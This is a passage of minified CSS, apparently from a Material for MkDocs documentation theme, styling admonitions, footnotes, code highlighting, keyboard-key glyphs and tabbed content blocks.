');--md-admonition-icon--bug:url('data:image/svg+xml;charset=utf-8,
');--md-admonition-icon--example:url('data:image/svg+xml;charset=utf-8,
');--md-admonition-icon--quote:url('data:image/svg+xml;charset=utf-8,
')}.md-typeset .admonition,.md-typeset details{background-color:var(--md-admonition-bg-color);border:.05rem solid #448aff;border-radius:.2rem;box-shadow:var(--md-shadow-z1);color:var(--md-admonition-fg-color);display:flow-root;font-size:.64rem;margin:1.5625em 0;padding:0 .6rem;page-break-inside:avoid}@media print{.md-typeset .admonition,.md-typeset details{box-shadow:none}}.md-typeset .admonition>*,.md-typeset details>*{box-sizing:border-box}.md-typeset .admonition .admonition,.md-typeset .admonition details,.md-typeset details .admonition,.md-typeset details details{margin-bottom:1em;margin-top:1em}.md-typeset .admonition .md-typeset__scrollwrap,.md-typeset details .md-typeset__scrollwrap{margin:1em -.6rem}.md-typeset .admonition .md-typeset__table,.md-typeset details .md-typeset__table{padding:0 .6rem}.md-typeset .admonition>.tabbed-set:only-child,.md-typeset details>.tabbed-set:only-child{margin-top:0}html .md-typeset .admonition>:last-child,html .md-typeset details>:last-child{margin-bottom:.6rem}[dir=ltr] .md-typeset .admonition-title,[dir=ltr] .md-typeset summary{padding-left:2rem;padding-right:.6rem}[dir=rtl] .md-typeset .admonition-title,[dir=rtl] .md-typeset summary{padding-left:.6rem;padding-right:2rem}[dir=ltr] .md-typeset .admonition-title,[dir=ltr] .md-typeset summary{border-left-width:.2rem}[dir=rtl] .md-typeset .admonition-title,[dir=rtl] .md-typeset summary{border-right-width:.2rem}[dir=ltr] .md-typeset .admonition-title,[dir=ltr] .md-typeset summary{border-top-left-radius:.1rem}[dir=ltr] .md-typeset .admonition-title,[dir=ltr] .md-typeset summary,[dir=rtl] .md-typeset .admonition-title,[dir=rtl] .md-typeset summary{border-top-right-radius:.1rem}[dir=rtl] .md-typeset .admonition-title,[dir=rtl] .md-typeset summary{border-top-left-radius:.1rem}.md-typeset .admonition-title,.md-typeset summary{background-color:#448aff1a;border:none;font-weight:700;margin:0 -.6rem;padding-bottom:.4rem;padding-top:.4rem;position:relative}html .md-typeset 
.admonition-title:last-child,html .md-typeset summary:last-child{margin-bottom:0}[dir=ltr] .md-typeset .admonition-title:before,[dir=ltr] .md-typeset summary:before{left:.6rem}[dir=rtl] .md-typeset .admonition-title:before,[dir=rtl] .md-typeset summary:before{right:.6rem}.md-typeset .admonition-title:before,.md-typeset summary:before{background-color:#448aff;content:"";height:1rem;-webkit-mask-image:var(--md-admonition-icon--note);mask-image:var(--md-admonition-icon--note);-webkit-mask-position:center;mask-position:center;-webkit-mask-repeat:no-repeat;mask-repeat:no-repeat;-webkit-mask-size:contain;mask-size:contain;position:absolute;top:.625em;width:1rem}.md-typeset .admonition-title code,.md-typeset summary code{box-shadow:0 0 0 .05rem var(--md-default-fg-color--lightest)}.md-typeset .admonition.note,.md-typeset details.note{border-color:#448aff}.md-typeset .note>.admonition-title,.md-typeset .note>summary{background-color:#448aff1a}.md-typeset .note>.admonition-title:before,.md-typeset .note>summary:before{background-color:#448aff;-webkit-mask-image:var(--md-admonition-icon--note);mask-image:var(--md-admonition-icon--note)}.md-typeset .note>.admonition-title:after,.md-typeset .note>summary:after{color:#448aff}.md-typeset .admonition.abstract,.md-typeset details.abstract{border-color:#00b0ff}.md-typeset .abstract>.admonition-title,.md-typeset .abstract>summary{background-color:#00b0ff1a}.md-typeset .abstract>.admonition-title:before,.md-typeset .abstract>summary:before{background-color:#00b0ff;-webkit-mask-image:var(--md-admonition-icon--abstract);mask-image:var(--md-admonition-icon--abstract)}.md-typeset .abstract>.admonition-title:after,.md-typeset .abstract>summary:after{color:#00b0ff}.md-typeset .admonition.info,.md-typeset details.info{border-color:#00b8d4}.md-typeset .info>.admonition-title,.md-typeset .info>summary{background-color:#00b8d41a}.md-typeset .info>.admonition-title:before,.md-typeset 
.info>summary:before{background-color:#00b8d4;-webkit-mask-image:var(--md-admonition-icon--info);mask-image:var(--md-admonition-icon--info)}.md-typeset .info>.admonition-title:after,.md-typeset .info>summary:after{color:#00b8d4}.md-typeset .admonition.tip,.md-typeset details.tip{border-color:#00bfa5}.md-typeset .tip>.admonition-title,.md-typeset .tip>summary{background-color:#00bfa51a}.md-typeset .tip>.admonition-title:before,.md-typeset .tip>summary:before{background-color:#00bfa5;-webkit-mask-image:var(--md-admonition-icon--tip);mask-image:var(--md-admonition-icon--tip)}.md-typeset .tip>.admonition-title:after,.md-typeset .tip>summary:after{color:#00bfa5}.md-typeset .admonition.success,.md-typeset details.success{border-color:#00c853}.md-typeset .success>.admonition-title,.md-typeset .success>summary{background-color:#00c8531a}.md-typeset .success>.admonition-title:before,.md-typeset .success>summary:before{background-color:#00c853;-webkit-mask-image:var(--md-admonition-icon--success);mask-image:var(--md-admonition-icon--success)}.md-typeset .success>.admonition-title:after,.md-typeset .success>summary:after{color:#00c853}.md-typeset .admonition.question,.md-typeset details.question{border-color:#64dd17}.md-typeset .question>.admonition-title,.md-typeset .question>summary{background-color:#64dd171a}.md-typeset .question>.admonition-title:before,.md-typeset .question>summary:before{background-color:#64dd17;-webkit-mask-image:var(--md-admonition-icon--question);mask-image:var(--md-admonition-icon--question)}.md-typeset .question>.admonition-title:after,.md-typeset .question>summary:after{color:#64dd17}.md-typeset .admonition.warning,.md-typeset details.warning{border-color:#ff9100}.md-typeset .warning>.admonition-title,.md-typeset .warning>summary{background-color:#ff91001a}.md-typeset .warning>.admonition-title:before,.md-typeset 
.warning>summary:before{background-color:#ff9100;-webkit-mask-image:var(--md-admonition-icon--warning);mask-image:var(--md-admonition-icon--warning)}.md-typeset .warning>.admonition-title:after,.md-typeset .warning>summary:after{color:#ff9100}.md-typeset .admonition.failure,.md-typeset details.failure{border-color:#ff5252}.md-typeset .failure>.admonition-title,.md-typeset .failure>summary{background-color:#ff52521a}.md-typeset .failure>.admonition-title:before,.md-typeset .failure>summary:before{background-color:#ff5252;-webkit-mask-image:var(--md-admonition-icon--failure);mask-image:var(--md-admonition-icon--failure)}.md-typeset .failure>.admonition-title:after,.md-typeset .failure>summary:after{color:#ff5252}.md-typeset .admonition.danger,.md-typeset details.danger{border-color:#ff1744}.md-typeset .danger>.admonition-title,.md-typeset .danger>summary{background-color:#ff17441a}.md-typeset .danger>.admonition-title:before,.md-typeset .danger>summary:before{background-color:#ff1744;-webkit-mask-image:var(--md-admonition-icon--danger);mask-image:var(--md-admonition-icon--danger)}.md-typeset .danger>.admonition-title:after,.md-typeset .danger>summary:after{color:#ff1744}.md-typeset .admonition.bug,.md-typeset details.bug{border-color:#f50057}.md-typeset .bug>.admonition-title,.md-typeset .bug>summary{background-color:#f500571a}.md-typeset .bug>.admonition-title:before,.md-typeset .bug>summary:before{background-color:#f50057;-webkit-mask-image:var(--md-admonition-icon--bug);mask-image:var(--md-admonition-icon--bug)}.md-typeset .bug>.admonition-title:after,.md-typeset .bug>summary:after{color:#f50057}.md-typeset .admonition.example,.md-typeset details.example{border-color:#7c4dff}.md-typeset .example>.admonition-title,.md-typeset .example>summary{background-color:#7c4dff1a}.md-typeset .example>.admonition-title:before,.md-typeset 
.example>summary:before{background-color:#7c4dff;-webkit-mask-image:var(--md-admonition-icon--example);mask-image:var(--md-admonition-icon--example)}.md-typeset .example>.admonition-title:after,.md-typeset .example>summary:after{color:#7c4dff}.md-typeset .admonition.quote,.md-typeset details.quote{border-color:#9e9e9e}.md-typeset .quote>.admonition-title,.md-typeset .quote>summary{background-color:#9e9e9e1a}.md-typeset .quote>.admonition-title:before,.md-typeset .quote>summary:before{background-color:#9e9e9e;-webkit-mask-image:var(--md-admonition-icon--quote);mask-image:var(--md-admonition-icon--quote)}.md-typeset .quote>.admonition-title:after,.md-typeset .quote>summary:after{color:#9e9e9e}:root{--md-footnotes-icon:url('data:image/svg+xml;charset=utf-8,
')}.md-typeset .footnote{color:var(--md-default-fg-color--light);font-size:.64rem}[dir=ltr] .md-typeset .footnote>ol{margin-left:0}[dir=rtl] .md-typeset .footnote>ol{margin-right:0}.md-typeset .footnote>ol>li{transition:color 125ms}.md-typeset .footnote>ol>li:target{color:var(--md-default-fg-color)}.md-typeset .footnote>ol>li:focus-within .footnote-backref{opacity:1;transform:translateX(0);transition:none}.md-typeset .footnote>ol>li:hover .footnote-backref,.md-typeset .footnote>ol>li:target .footnote-backref{opacity:1;transform:translateX(0)}.md-typeset .footnote>ol>li>:first-child{margin-top:0}.md-typeset .footnote-ref{font-size:.75em;font-weight:700}html .md-typeset .footnote-ref{outline-offset:.1rem}.md-typeset [id^="fnref:"]:target>.footnote-ref{outline:auto}.md-typeset .footnote-backref{color:var(--md-typeset-a-color);display:inline-block;font-size:0;opacity:0;transform:translateX(.25rem);transition:color .25s,transform .25s .25s,opacity 125ms .25s;vertical-align:text-bottom}@media print{.md-typeset .footnote-backref{color:var(--md-typeset-a-color);opacity:1;transform:translateX(0)}}[dir=rtl] .md-typeset .footnote-backref{transform:translateX(-.25rem)}.md-typeset .footnote-backref:hover{color:var(--md-accent-fg-color)}.md-typeset .footnote-backref:before{background-color:currentcolor;content:"";display:inline-block;height:.8rem;-webkit-mask-image:var(--md-footnotes-icon);mask-image:var(--md-footnotes-icon);-webkit-mask-position:center;mask-position:center;-webkit-mask-repeat:no-repeat;mask-repeat:no-repeat;-webkit-mask-size:contain;mask-size:contain;width:.8rem}[dir=rtl] .md-typeset .footnote-backref:before svg{transform:scaleX(-1)}[dir=ltr] .md-typeset .headerlink{margin-left:.5rem}[dir=rtl] .md-typeset .headerlink{margin-right:.5rem}.md-typeset .headerlink{color:var(--md-default-fg-color--lighter);display:inline-block;opacity:0;transition:color .25s,opacity 125ms}@media print{.md-typeset .headerlink{display:none}}.md-typeset .headerlink:focus,.md-typeset 
:hover>.headerlink,.md-typeset :target>.headerlink{opacity:1;transition:color .25s,opacity 125ms}.md-typeset .headerlink:focus,.md-typeset .headerlink:hover,.md-typeset :target>.headerlink{color:var(--md-accent-fg-color)}.md-typeset :target{--md-scroll-margin:3.6rem;--md-scroll-offset:0rem;scroll-margin-top:calc(var(--md-scroll-margin) - var(--md-scroll-offset))}@media screen and (min-width:76.25em){.md-header--lifted~.md-container .md-typeset :target{--md-scroll-margin:6rem}}.md-typeset h1:target,.md-typeset h2:target,.md-typeset h3:target{--md-scroll-offset:0.2rem}.md-typeset h4:target{--md-scroll-offset:0.15rem}.md-typeset div.arithmatex{overflow:auto}@media screen and (max-width:44.9375em){.md-typeset div.arithmatex{margin:0 -.8rem}}.md-typeset div.arithmatex>*{margin-left:auto!important;margin-right:auto!important;padding:0 .8rem;touch-action:auto;width:-webkit-min-content;width:min-content}.md-typeset div.arithmatex>* mjx-container{margin:0!important}.md-typeset del.critic{background-color:var(--md-typeset-del-color)}.md-typeset del.critic,.md-typeset ins.critic{-webkit-box-decoration-break:clone;box-decoration-break:clone}.md-typeset ins.critic{background-color:var(--md-typeset-ins-color)}.md-typeset .critic.comment{-webkit-box-decoration-break:clone;box-decoration-break:clone;color:var(--md-code-hl-comment-color)}.md-typeset .critic.comment:before{content:"/* "}.md-typeset .critic.comment:after{content:" */"}.md-typeset .critic.block{box-shadow:none;display:block;margin:1em 0;overflow:auto;padding-left:.8rem;padding-right:.8rem}.md-typeset .critic.block>:first-child{margin-top:.5em}.md-typeset .critic.block>:last-child{margin-bottom:.5em}:root{--md-details-icon:url('data:image/svg+xml;charset=utf-8,
')}.md-typeset details{display:flow-root;overflow:visible;padding-top:0}.md-typeset details[open]>summary:after{transform:rotate(90deg)}.md-typeset details:not([open]){box-shadow:none;padding-bottom:0}.md-typeset details:not([open])>summary{border-radius:.1rem}[dir=ltr] .md-typeset summary{padding-right:1.8rem}[dir=rtl] .md-typeset summary{padding-left:1.8rem}[dir=ltr] .md-typeset summary{border-top-left-radius:.1rem}[dir=ltr] .md-typeset summary,[dir=rtl] .md-typeset summary{border-top-right-radius:.1rem}[dir=rtl] .md-typeset summary{border-top-left-radius:.1rem}.md-typeset summary{cursor:pointer;display:block;min-height:1rem}.md-typeset summary.focus-visible{outline-color:var(--md-accent-fg-color);outline-offset:.2rem}.md-typeset summary:not(.focus-visible){-webkit-tap-highlight-color:transparent;outline:none}[dir=ltr] .md-typeset summary:after{right:.4rem}[dir=rtl] .md-typeset summary:after{left:.4rem}.md-typeset summary:after{background-color:currentcolor;content:"";height:1rem;-webkit-mask-image:var(--md-details-icon);mask-image:var(--md-details-icon);-webkit-mask-position:center;mask-position:center;-webkit-mask-repeat:no-repeat;mask-repeat:no-repeat;-webkit-mask-size:contain;mask-size:contain;position:absolute;top:.625em;transform:rotate(0deg);transition:transform .25s;width:1rem}[dir=rtl] .md-typeset summary:after{transform:rotate(180deg)}.md-typeset summary::marker{display:none}.md-typeset summary::-webkit-details-marker{display:none}.md-typeset .emojione,.md-typeset .gemoji,.md-typeset .twemoji{display:inline-flex;height:1.125em;vertical-align:text-top}.md-typeset .emojione svg,.md-typeset .gemoji svg,.md-typeset .twemoji svg{fill:currentcolor;max-height:100%;width:1.125em}.highlight .o,.highlight .ow{color:var(--md-code-hl-operator-color)}.highlight .p{color:var(--md-code-hl-punctuation-color)}.highlight .cpf,.highlight .l,.highlight .s,.highlight .s1,.highlight .s2,.highlight .sb,.highlight .sc,.highlight .si,.highlight 
.ss{color:var(--md-code-hl-string-color)}.highlight .cp,.highlight .se,.highlight .sh,.highlight .sr,.highlight .sx{color:var(--md-code-hl-special-color)}.highlight .il,.highlight .m,.highlight .mb,.highlight .mf,.highlight .mh,.highlight .mi,.highlight .mo{color:var(--md-code-hl-number-color)}.highlight .k,.highlight .kd,.highlight .kn,.highlight .kp,.highlight .kr,.highlight .kt{color:var(--md-code-hl-keyword-color)}.highlight .kc,.highlight .n{color:var(--md-code-hl-name-color)}.highlight .bp,.highlight .nb,.highlight .no{color:var(--md-code-hl-constant-color)}.highlight .nc,.highlight .ne,.highlight .nf,.highlight .nn{color:var(--md-code-hl-function-color)}.highlight .nd,.highlight .ni,.highlight .nl,.highlight .nt{color:var(--md-code-hl-keyword-color)}.highlight .c,.highlight .c1,.highlight .ch,.highlight .cm,.highlight .cs,.highlight .sd{color:var(--md-code-hl-comment-color)}.highlight .na,.highlight .nv,.highlight .vc,.highlight .vg,.highlight .vi{color:var(--md-code-hl-variable-color)}.highlight .ge,.highlight .gh,.highlight .go,.highlight .gp,.highlight .gr,.highlight .gs,.highlight .gt,.highlight .gu{color:var(--md-code-hl-generic-color)}.highlight .gd,.highlight .gi{border-radius:.1rem;margin:0 -.125em;padding:0 .125em}.highlight .gd{background-color:var(--md-typeset-del-color)}.highlight .gi{background-color:var(--md-typeset-ins-color)}.highlight .hll{background-color:var(--md-code-hl-color);display:block;margin:0 -1.1764705882em;padding:0 1.1764705882em}.highlight span.filename{background-color:var(--md-code-bg-color);border-bottom:.05rem solid var(--md-default-fg-color--lightest);border-top-left-radius:.1rem;border-top-right-radius:.1rem;display:flow-root;font-size:.85em;font-weight:700;margin-top:1em;padding:.6617647059em 1.1764705882em;position:relative}.highlight span.filename+pre{margin-top:0}.highlight span.filename+pre>code{border-top-left-radius:0;border-top-right-radius:0}.highlight 
[data-linenos]:before{background-color:var(--md-code-bg-color);box-shadow:-.05rem 0 var(--md-default-fg-color--lightest) inset;color:var(--md-default-fg-color--light);content:attr(data-linenos);float:left;left:-1.1764705882em;margin-left:-1.1764705882em;margin-right:1.1764705882em;padding-left:1.1764705882em;position:sticky;-webkit-user-select:none;-moz-user-select:none;user-select:none;z-index:3}.highlight code a[id]{position:absolute;visibility:hidden}.highlight code[data-md-copying] .hll{display:contents}.highlight code[data-md-copying] .md-annotation{display:none}.highlighttable{display:flow-root}.highlighttable tbody,.highlighttable td{display:block;padding:0}.highlighttable tr{display:flex}.highlighttable pre{margin:0}.highlighttable th.filename{flex-grow:1;padding:0;text-align:left}.highlighttable th.filename span.filename{margin-top:0}.highlighttable .linenos{background-color:var(--md-code-bg-color);border-bottom-left-radius:.1rem;border-top-left-radius:.1rem;font-size:.85em;padding:.7720588235em 0 .7720588235em 1.1764705882em;-webkit-user-select:none;-moz-user-select:none;user-select:none}.highlighttable .linenodiv{box-shadow:-.05rem 0 var(--md-default-fg-color--lightest) inset;padding-right:.5882352941em}.highlighttable .linenodiv pre{color:var(--md-default-fg-color--light);text-align:right}.highlighttable .code{flex:1;min-width:0}.linenodiv a{color:inherit}.md-typeset .highlighttable{direction:ltr;margin:1em 0}.md-typeset .highlighttable>tbody>tr>.code>div>pre>code{border-bottom-left-radius:0;border-top-left-radius:0}.md-typeset .highlight+.result{border:.05rem solid var(--md-code-bg-color);border-bottom-left-radius:.1rem;border-bottom-right-radius:.1rem;border-top-width:.1rem;margin-top:-1.125em;overflow:visible;padding:0 1em}.md-typeset .highlight+.result:after{clear:both;content:"";display:block}@media screen and (max-width:44.9375em){.md-content__inner>.highlight{margin:1em 
-.8rem}.md-content__inner>.highlight>.filename,.md-content__inner>.highlight>.highlighttable>tbody>tr>.code>div>pre>code,.md-content__inner>.highlight>.highlighttable>tbody>tr>.filename span.filename,.md-content__inner>.highlight>.highlighttable>tbody>tr>.linenos,.md-content__inner>.highlight>pre>code{border-radius:0}.md-content__inner>.highlight+.result{border-left-width:0;border-radius:0;border-right-width:0;margin-left:-.8rem;margin-right:-.8rem}}.md-typeset .keys kbd:after,.md-typeset .keys kbd:before{-moz-osx-font-smoothing:initial;-webkit-font-smoothing:initial;color:inherit;margin:0;position:relative}.md-typeset .keys span{color:var(--md-default-fg-color--light);padding:0 .2em}.md-typeset .keys .key-alt:before,.md-typeset .keys .key-left-alt:before,.md-typeset .keys .key-right-alt:before{content:"â‡";padding-right:.4em}.md-typeset .keys .key-command:before,.md-typeset .keys .key-left-command:before,.md-typeset .keys .key-right-command:before{content:"⌘";padding-right:.4em}.md-typeset .keys .key-control:before,.md-typeset .keys .key-left-control:before,.md-typeset .keys .key-right-control:before{content:"⌃";padding-right:.4em}.md-typeset .keys .key-left-meta:before,.md-typeset .keys .key-meta:before,.md-typeset .keys .key-right-meta:before{content:"â—†";padding-right:.4em}.md-typeset .keys .key-left-option:before,.md-typeset .keys .key-option:before,.md-typeset .keys .key-right-option:before{content:"⌥";padding-right:.4em}.md-typeset .keys .key-left-shift:before,.md-typeset .keys .key-right-shift:before,.md-typeset .keys .key-shift:before{content:"⇧";padding-right:.4em}.md-typeset .keys .key-left-super:before,.md-typeset .keys .key-right-super:before,.md-typeset .keys .key-super:before{content:"â–";padding-right:.4em}.md-typeset .keys .key-left-windows:before,.md-typeset .keys .key-right-windows:before,.md-typeset .keys .key-windows:before{content:"â";padding-right:.4em}.md-typeset .keys .key-arrow-down:before{content:"↓";padding-right:.4em}.md-typeset .keys 
.key-arrow-left:before{content:"â†";padding-right:.4em}.md-typeset .keys .key-arrow-right:before{content:"→";padding-right:.4em}.md-typeset .keys .key-arrow-up:before{content:"↑";padding-right:.4em}.md-typeset .keys .key-backspace:before{content:"⌫";padding-right:.4em}.md-typeset .keys .key-backtab:before{content:"⇤";padding-right:.4em}.md-typeset .keys .key-caps-lock:before{content:"⇪";padding-right:.4em}.md-typeset .keys .key-clear:before{content:"⌧";padding-right:.4em}.md-typeset .keys .key-context-menu:before{content:"☰";padding-right:.4em}.md-typeset .keys .key-delete:before{content:"⌦";padding-right:.4em}.md-typeset .keys .key-eject:before{content:"â";padding-right:.4em}.md-typeset .keys .key-end:before{content:"⤓";padding-right:.4em}.md-typeset .keys .key-escape:before{content:"â‹";padding-right:.4em}.md-typeset .keys .key-home:before{content:"⤒";padding-right:.4em}.md-typeset .keys .key-insert:before{content:"â€";padding-right:.4em}.md-typeset .keys .key-page-down:before{content:"⇟";padding-right:.4em}.md-typeset .keys .key-page-up:before{content:"â‡";padding-right:.4em}.md-typeset .keys .key-print-screen:before{content:"â™";padding-right:.4em}.md-typeset .keys .key-tab:after{content:"⇥";padding-left:.4em}.md-typeset .keys .key-num-enter:after{content:"⌤";padding-left:.4em}.md-typeset .keys .key-enter:after{content:"â";padding-left:.4em}:root{--md-tabbed-icon--prev:url('data:image/svg+xml;charset=utf-8,
');--md-tabbed-icon--next:url('data:image/svg+xml;charset=utf-8,
')}.md-typeset .tabbed-set{border-radius:.1rem;display:flex;flex-flow:column wrap;margin:1em 0;position:relative}.md-typeset .tabbed-set>input{height:0;opacity:0;position:absolute;width:0}.md-typeset .tabbed-set>input:target{--md-scroll-offset:0.625em}.md-typeset .tabbed-labels{-ms-overflow-style:none;box-shadow:0 -.05rem var(--md-default-fg-color--lightest) inset;display:flex;max-width:100%;overflow:auto;scrollbar-width:none}@media print{.md-typeset .tabbed-labels{display:contents}}@media screen{.js .md-typeset .tabbed-labels{position:relative}.js .md-typeset .tabbed-labels:before{background:var(--md-accent-fg-color);bottom:0;content:"";display:block;height:2px;left:0;position:absolute;transform:translateX(var(--md-indicator-x));transition:width 225ms,transform .25s;transition-timing-function:cubic-bezier(.4,0,.2,1);width:var(--md-indicator-width)}}.md-typeset .tabbed-labels::-webkit-scrollbar{display:none}.md-typeset .tabbed-labels>label{border-bottom:.1rem solid #0000;border-radius:.1rem .1rem 0 0;color:var(--md-default-fg-color--light);cursor:pointer;flex-shrink:0;font-size:.64rem;font-weight:700;padding:.78125em 1.25em .625em;scroll-margin-inline-start:1rem;transition:background-color .25s,color .25s;white-space:nowrap;width:auto}@media print{.md-typeset .tabbed-labels>label:first-child{order:1}.md-typeset .tabbed-labels>label:nth-child(2){order:2}.md-typeset .tabbed-labels>label:nth-child(3){order:3}.md-typeset .tabbed-labels>label:nth-child(4){order:4}.md-typeset .tabbed-labels>label:nth-child(5){order:5}.md-typeset .tabbed-labels>label:nth-child(6){order:6}.md-typeset .tabbed-labels>label:nth-child(7){order:7}.md-typeset .tabbed-labels>label:nth-child(8){order:8}.md-typeset .tabbed-labels>label:nth-child(9){order:9}.md-typeset .tabbed-labels>label:nth-child(10){order:10}.md-typeset .tabbed-labels>label:nth-child(11){order:11}.md-typeset .tabbed-labels>label:nth-child(12){order:12}.md-typeset .tabbed-labels>label:nth-child(13){order:13}.md-typeset 
.tabbed-labels>label:nth-child(14){order:14}.md-typeset .tabbed-labels>label:nth-child(15){order:15}.md-typeset .tabbed-labels>label:nth-child(16){order:16}.md-typeset .tabbed-labels>label:nth-child(17){order:17}.md-typeset .tabbed-labels>label:nth-child(18){order:18}.md-typeset .tabbed-labels>label:nth-child(19){order:19}.md-typeset .tabbed-labels>label:nth-child(20){order:20}}.md-typeset .tabbed-labels>label:hover{color:var(--md-accent-fg-color)}.md-typeset .tabbed-content{width:100%}@media print{.md-typeset .tabbed-content{display:contents}}.md-typeset .tabbed-block{display:none}@media print{.md-typeset .tabbed-block{display:block}.md-typeset .tabbed-block:first-child{order:1}.md-typeset .tabbed-block:nth-child(2){order:2}.md-typeset .tabbed-block:nth-child(3){order:3}.md-typeset .tabbed-block:nth-child(4){order:4}.md-typeset .tabbed-block:nth-child(5){order:5}.md-typeset .tabbed-block:nth-child(6){order:6}.md-typeset .tabbed-block:nth-child(7){order:7}.md-typeset .tabbed-block:nth-child(8){order:8}.md-typeset .tabbed-block:nth-child(9){order:9}.md-typeset .tabbed-block:nth-child(10){order:10}.md-typeset .tabbed-block:nth-child(11){order:11}.md-typeset .tabbed-block:nth-child(12){order:12}.md-typeset .tabbed-block:nth-child(13){order:13}.md-typeset .tabbed-block:nth-child(14){order:14}.md-typeset .tabbed-block:nth-child(15){order:15}.md-typeset .tabbed-block:nth-child(16){order:16}.md-typeset .tabbed-block:nth-child(17){order:17}.md-typeset .tabbed-block:nth-child(18){order:18}.md-typeset .tabbed-block:nth-child(19){order:19}.md-typeset .tabbed-block:nth-child(20){order:20}}.md-typeset .tabbed-block>.highlight:first-child>pre,.md-typeset .tabbed-block>pre:first-child{margin:0}.md-typeset .tabbed-block>.highlight:first-child>pre>code,.md-typeset .tabbed-block>pre:first-child>code{border-top-left-radius:0;border-top-right-radius:0}.md-typeset .tabbed-block>.highlight:first-child>.filename{border-top-left-radius:0;border-top-right-radius:0;margin:0}.md-typeset 
.tabbed-block>.highlight:first-child>.highlighttable{margin:0}.md-typeset .tabbed-block>.highlight:first-child>.highlighttable>tbody>tr>.filename span.filename,.md-typeset .tabbed-block>.highlight:first-child>.highlighttable>tbody>tr>.linenos{border-top-left-radius:0;border-top-right-radius:0;margin:0}.md-typeset .tabbed-block>.highlight:first-child>.highlighttable>tbody>tr>.code>div>pre>code{border-top-left-radius:0;border-top-right-radius:0}.md-typeset .tabbed-block>.highlight:first-child+.result{margin-top:-.125em}.md-typeset .tabbed-block>.tabbed-set{margin:0}.md-typeset .tabbed-button{align-self:center;border-radius:100%;color:var(--md-default-fg-color--light);cursor:pointer;display:block;height:.9rem;margin-top:.1rem;pointer-events:auto;transition:background-color .25s;width:.9rem}.md-typeset .tabbed-button:hover{background-color:var(--md-accent-fg-color--transparent);color:var(--md-accent-fg-color)}.md-typeset .tabbed-button:after{background-color:currentcolor;content:"";display:block;height:100%;-webkit-mask-image:var(--md-tabbed-icon--prev);mask-image:var(--md-tabbed-icon--prev);-webkit-mask-position:center;mask-position:center;-webkit-mask-repeat:no-repeat;mask-repeat:no-repeat;-webkit-mask-size:contain;mask-size:contain;transition:background-color .25s,transform .25s;width:100%}.md-typeset .tabbed-control{background:linear-gradient(to right,var(--md-default-bg-color) 60%,#0000);display:flex;height:1.9rem;justify-content:start;pointer-events:none;position:absolute;transition:opacity 125ms;width:1.2rem}[dir=rtl] .md-typeset .tabbed-control{transform:rotate(180deg)}.md-typeset .tabbed-control[hidden]{opacity:0}.md-typeset .tabbed-control--next{background:linear-gradient(to left,var(--md-default-bg-color) 60%,#0000);justify-content:end;right:0}.md-typeset .tabbed-control--next .tabbed-button:after{-webkit-mask-image:var(--md-tabbed-icon--next);mask-image:var(--md-tabbed-icon--next)}@media screen and (max-width:44.9375em){[dir=ltr] 
.md-content__inner>.tabbed-set .tabbed-labels{padding-left:.8rem}[dir=rtl] .md-content__inner>.tabbed-set .tabbed-labels{padding-right:.8rem}.md-content__inner>.tabbed-set .tabbed-labels{margin:0 -.8rem;max-width:100vw;scroll-padding-inline-start:.8rem}[dir=ltr] .md-content__inner>.tabbed-set .tabbed-labels:after{padding-right:.8rem}[dir=rtl] .md-content__inner>.tabbed-set .tabbed-labels:after{padding-left:.8rem}.md-content__inner>.tabbed-set .tabbed-labels:after{content:""}[dir=ltr] .md-content__inner>.tabbed-set .tabbed-labels~.tabbed-control--prev{padding-left:.8rem}[dir=rtl] .md-content__inner>.tabbed-set .tabbed-labels~.tabbed-control--prev{padding-right:.8rem}[dir=ltr] .md-content__inner>.tabbed-set .tabbed-labels~.tabbed-control--prev{margin-left:-.8rem}[dir=rtl] .md-content__inner>.tabbed-set .tabbed-labels~.tabbed-control--prev{margin-right:-.8rem}.md-content__inner>.tabbed-set .tabbed-labels~.tabbed-control--prev{width:2rem}[dir=ltr] .md-content__inner>.tabbed-set .tabbed-labels~.tabbed-control--next{padding-right:.8rem}[dir=rtl] .md-content__inner>.tabbed-set .tabbed-labels~.tabbed-control--next{padding-left:.8rem}[dir=ltr] .md-content__inner>.tabbed-set .tabbed-labels~.tabbed-control--next{margin-right:-.8rem}[dir=rtl] .md-content__inner>.tabbed-set .tabbed-labels~.tabbed-control--next{margin-left:-.8rem}.md-content__inner>.tabbed-set .tabbed-labels~.tabbed-control--next{width:2rem}}@media screen{.md-typeset .tabbed-set>input:first-child:checked~.tabbed-labels>:first-child,.md-typeset .tabbed-set>input:nth-child(10):checked~.tabbed-labels>:nth-child(10),.md-typeset .tabbed-set>input:nth-child(11):checked~.tabbed-labels>:nth-child(11),.md-typeset .tabbed-set>input:nth-child(12):checked~.tabbed-labels>:nth-child(12),.md-typeset .tabbed-set>input:nth-child(13):checked~.tabbed-labels>:nth-child(13),.md-typeset .tabbed-set>input:nth-child(14):checked~.tabbed-labels>:nth-child(14),.md-typeset 
.tabbed-set>input:nth-child(15):checked~.tabbed-labels>:nth-child(15),.md-typeset .tabbed-set>input:nth-child(16):checked~.tabbed-labels>:nth-child(16),.md-typeset .tabbed-set>input:nth-child(17):checked~.tabbed-labels>:nth-child(17),.md-typeset .tabbed-set>input:nth-child(18):checked~.tabbed-labels>:nth-child(18),.md-typeset .tabbed-set>input:nth-child(19):checked~.tabbed-labels>:nth-child(19),.md-typeset .tabbed-set>input:nth-child(2):checked~.tabbed-labels>:nth-child(2),.md-typeset .tabbed-set>input:nth-child(20):checked~.tabbed-labels>:nth-child(20),.md-typeset .tabbed-set>input:nth-child(3):checked~.tabbed-labels>:nth-child(3),.md-typeset .tabbed-set>input:nth-child(4):checked~.tabbed-labels>:nth-child(4),.md-typeset .tabbed-set>input:nth-child(5):checked~.tabbed-labels>:nth-child(5),.md-typeset .tabbed-set>input:nth-child(6):checked~.tabbed-labels>:nth-child(6),.md-typeset .tabbed-set>input:nth-child(7):checked~.tabbed-labels>:nth-child(7),.md-typeset .tabbed-set>input:nth-child(8):checked~.tabbed-labels>:nth-child(8),.md-typeset .tabbed-set>input:nth-child(9):checked~.tabbed-labels>:nth-child(9){color:var(--md-accent-fg-color)}.md-typeset .no-js .tabbed-set>input:first-child:checked~.tabbed-labels>:first-child,.md-typeset .no-js .tabbed-set>input:nth-child(10):checked~.tabbed-labels>:nth-child(10),.md-typeset .no-js .tabbed-set>input:nth-child(11):checked~.tabbed-labels>:nth-child(11),.md-typeset .no-js .tabbed-set>input:nth-child(12):checked~.tabbed-labels>:nth-child(12),.md-typeset .no-js .tabbed-set>input:nth-child(13):checked~.tabbed-labels>:nth-child(13),.md-typeset .no-js .tabbed-set>input:nth-child(14):checked~.tabbed-labels>:nth-child(14),.md-typeset .no-js 